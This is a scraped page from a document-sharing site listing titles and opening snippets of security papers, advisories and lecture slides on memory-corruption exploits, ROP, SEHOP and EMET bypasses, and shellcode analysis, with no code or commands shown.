Bypassing SEHOP Stéfan Le Berre s.leberre@sysdream.com Damien Cauquil d.cauquil@sysdream.com Table of contents 0. Introduction...3 1. SEHOP specifications (short version)...3 2. Dealing with SEHOP when
More informationChangelog. Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part
1 Changelog 1 Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part OVER questions? 2 last time 3 memory management problems
More informationCMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING
CMSC 313 COMPUTER ORGANIZATION & ASSEMBLY LANGUAGE PROGRAMMING LECTURE 16, SPRING 2013 TOPICS TODAY Project 6 Perils & Pitfalls of Memory Allocation C Function Call Conventions in Assembly Language PERILS
More informationSA30285 / CVE
Generated by Secunia 17 December, 2008 6 pages Table of Contents Introduction 2 Technical Details 2 Exploitation 5 Characteristics 6 Tested Versions 6 Fixed Versions 6 References 6 Generated by Secunia
More informationAssembly Language: Function Calls" Goals of this Lecture"
Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and urning" Passing parameters" Storing local variables" Handling registers without interference"
More informationThe Geometry of Innocent Flesh on the Bone
The Geometry of Innocent Flesh on the Bone Return-into-libc without Function Calls (on the x86) Hovav Shacham hovav@cs.ucsd.edu CCS 07 Technical Background Gadget: a short instructions sequence (e.x. pop
More informationUSING EMET TO DISABLE EMET
USING EMET TO DISABLE EMET USING EMET TO DISABLE EMET Presented by Abdulellah Alsaheel, Consultant Raghav Pande, Research Scientist Abdulellah Alsaheel Consultant at Mandiant (A FireEye Company) Saudi
More informationReverse Engineering II: Basics. Gergely Erdélyi Senior Antivirus Researcher
Reverse Engineering II: Basics Gergely Erdélyi Senior Antivirus Researcher Agenda Very basics Intel x86 crash course Basics of C Binary Numbers Binary Numbers 1 Binary Numbers 1 0 1 1 Binary Numbers 1
More informationI Control Your Code Attack Vectors through the Eyes of Software-based Fault Isolation. Mathias Payer
I Control Your Code Attack Vectors through the Eyes of Software-based Fault Isolation Mathias Payer Motivation Current exploits are powerful because Applications run on coarse-grained
More informationAssembly Language: Function Calls. Goals of this Lecture. Function Call Problems
Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and urning Passing parameters Storing local variables Handling registers without interference Returning
More informationDEEP HOOKS MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS. Yarden Assaf
DEEP HOOKS MONITORING NATIVE EXECUTION IN WOW64 APPLICATIONS Assaf Carlsbad @assaf_carlsbad Yarden Shafir @yarden_shafir Yarden I started dancing at the age of 7 and later competed with a rhythmic gymnastics
More informationProgram Exploitation Intro
Program Exploitation Intro x86 Assembly 04//2018 Security 1 Univeristà Ca Foscari, Venezia What is Program Exploitation "Making a program do something unexpected and not planned" The right bugs can be
More informationEthical Hacking: Preventing & Writing Buffer Overflow Exploits
Ethical Hacking: Preventing & Writing Buffer Overflow Exploits Rochester Security Summit 2014 Rochester OWASP Chapter Lead Ralph Durkee - Durkee Consulting, Inc. info@rd1.net Ralph Durkee Background Founder
More informationSoftware Security II: Memory Errors - Attacks & Defenses
1 Software Security II: Memory Errors - Attacks & Defenses Chengyu Song Slides modified from Dawn Song 2 Administrivia Lab1 Writeup 3 Buffer overflow Out-of-bound memory writes (mostly sequential) Allow
More informationCYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge
CYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge Instructor: Dr. Kun Sun This lecture: [Seacord]: Chapter 3 Readings 2 Outline Secure Coding Topics String management
More informationCS 499 Lab 3: Disassembly of slammer.bin I. PURPOSE
CS 499 Lab 3: Disassembly of slammer.bin I. PURPOSE The purpose of this exercise is to learn Intel assembly language by disassembling a small piece of code and extensively commenting the resulting instructions.
More informationNever Let Your Guard Down: Finding Unguarded Gates to Bypass Control Flow Guard with Big Data
Never Let Your Guard Down: Finding Unguarded Gates to Bypass Control Flow Guard with Big Data Ke Sun Ya Ou Yanhui Zhao Xiaomin Song Xiaoning Li wildsator@gmail.com perfectno2015@gmail.com wildyz.yky@gmail.com
More informationVivisection of an Exploit: What To Do When It Isn't Easy. Dave Aitel Immunity, Inc
Vivisection of an Exploit: What To Do When It Isn't Easy Dave Aitel Immunity, Inc http://www.immunitysec.com Who am I? Founder, Immunity, Inc. NYC based consulting and products company CANVAS: Exploitation
More informationIsomeron: Code Randomization Resilient to (Just-In-Time) Return-Oriented Programming
Isomeron: Code Randomization Resilient to (Just-In-Time) Return-Oriented Programming Lucas Davi, Christopher Liebchen, Ahmad-Reza Sadeghi CASED/Technische Universität Darmstadt, Germany Email: {lucas.davi,christopher.liebchen,
More informationShellcode Analysis. Chapter 19
Shellcode Analysis Chapter 19 What is Shellcode Shellcode a payload of raw executable code, attackers use this code to obtain interactive shell access. A binary chunk of data Can be generally referred
More informationControl Hijacking Attacks
Control Hijacking Attacks Alexandros Kapravelos kapravelos@ncsu.edu (Derived from slides from Chris Kruegel) Attacker s mindset Take control of the victim s machine Hijack the execution flow of a running
More informationRoadmap: Security in the software lifecycle. Memory corruption vulnerabilities
Secure Programming Lecture 3: Memory Corruption I (introduction) David Aspinall, Informatics @ Edinburgh 24th January 2019 Roadmap: Security in the software lifecycle Security is considered at different
More informationCSC369 Lecture 2. Larry Zhang, September 21, 2015
CSC369 Lecture 2 Larry Zhang, September 21, 2015 1 Volunteer note-taker needed by accessibility service see announcement on Piazza for details 2 Change to office hour to resolve conflict with CSC373 lecture
More informationidkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com idkwim.linknow.
idkwim@gmail.com idkwim in SecurityFirst 0x16 years old Linux system security researcher idkwim.tistory.com choicy90@nate.com (Nate-On) @idkwim idkwim.linknow.kr Zombie PC?? -> No! Return Oriented Programming
More informationMWR InfoSecurity Security Advisory. IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability. 4th March 2010
MWR InfoSecurity Security Advisory IBM WebSphere MQ - rridecompress Remote Denial of Service Vulnerability 4th March 2010 2010-03-04 Page 1 of 9 Contents Contents 1 Detailed Vulnerability Description...
More informationSecure Coding Topics. Readings. CYSE 411/AIT681 Secure Software Engineering. Pointer Subterfuge. Outline. Data Locations (cont d) Data Locations
This lecture: [Seacord]: Chapter 3 Readings CYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge Instructor: Dr. Kun Sun 2 Outline Secure Coding Topics String management
More informationSecure Coding Topics. CYSE 411/AIT681 Secure Software Engineering. Readings. Outline. This lecture: Topic #8. Secure Coding: Pointer Subterfuge
CYSE 411/AIT681 Secure Software Engineering Topic #8. Secure Coding: Pointer Subterfuge Instructor: Dr. Kun Sun This lecture: [Seacord]: Chapter 3 Readings 2 Outline Secure Coding Topics String management
More informationBuffer overflow background
and heap buffer background Comp Sci 3600 Security Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Address Space and heap buffer
More informationSecure Programming Lecture 3: Memory Corruption I (Stack Overflows)
Secure Programming Lecture 3: Memory Corruption I (Stack Overflows) David Aspinall, Informatics @ Edinburgh 24th January 2017 Outline Roadmap Memory corruption vulnerabilities Instant Languages and Runtimes
More information